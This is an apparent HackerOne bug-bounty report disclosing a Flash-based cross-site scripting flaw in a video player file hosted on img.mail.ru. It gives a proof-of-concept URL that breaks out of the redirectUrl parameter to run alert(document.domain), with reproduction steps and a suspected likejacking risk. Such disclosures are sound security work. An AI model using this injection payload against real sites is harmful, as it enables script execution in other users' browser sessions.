Mail.ru: Flash XSS on img.mail.ru

2015-04-28T13:41:45
ID H1:58831
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:22:06

Description

Vulnerable Flash File: http://img.mail.ru/r/video2/player_v2.swf

Steps: + Open http://img.mail.ru/r/video2/player_v2.swf?metadataUrl=http://videoapi.my.mail.ru/videos//community/mir/_groupvideo/921.json&redirectUrl=\%22));alert(document.domain);}catch(e){}// + Click on social share and click on anything (eg. twitter)

Severity: + XSS on + There is an ActionScript function ApplicationController.like bound to javascript using external interface. So, I suspect that like jacking is possible since img.mail.ru doesn't send X-FRAME-OPTIONS.